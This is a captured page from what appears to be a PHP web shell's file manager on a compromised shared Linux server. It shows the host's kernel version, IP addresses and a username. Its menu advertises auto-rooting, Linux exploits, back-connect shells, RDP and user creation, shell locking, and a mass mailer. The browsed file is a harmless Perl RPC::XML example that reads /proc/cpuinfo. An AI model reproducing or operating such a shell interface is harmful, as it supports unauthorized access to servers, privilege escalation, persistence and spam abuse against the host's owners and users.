Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
librpc-xml-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
linux.proc.cpuinfo.base
154
B
-rw-r--r--
linux.proc.cpuinfo.code
882
B
-rw-r--r--
linux.proc.cpuinfo.help
313
B
-rw-r--r--
linux.proc.cpuinfo.xpl
1.55
KB
-rw-r--r--
linux.proc.meminfo.base
154
B
-rw-r--r--
linux.proc.meminfo.code
1.18
KB
-rw-r--r--
linux.proc.meminfo.help
882
B
-rw-r--r--
linux.proc.meminfo.xpl
2.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : linux.proc.cpuinfo.code
############################################################################### # # Sub Name: linux_proc_cpuinfo # # Description: Read the /proc/cpuinfo on a Linux server and return a # STRUCT with the information. # # Arguments: None. # # Returns: hashref # ############################################################################### sub linux_proc_sysinfo { use strict; my (%cpuinfo, $line, $key, $value); local *F; open(F, '/proc/cpuinfo') or return RPC::XML::fault->new(501, "Cannot open /proc/cpuinfo: $!"); while (defined($line = <F>)) { chomp $line; next if ($line =~ /^\s*$/); ($key, $value) = split(/\s+:\s+/, $line, 2); $key =~ s/ /_/g; $cpuinfo{$key} = ($key eq 'flags') ? [ split(/ /, $value) ] : $value; } close(F); \%cpuinfo; }
Close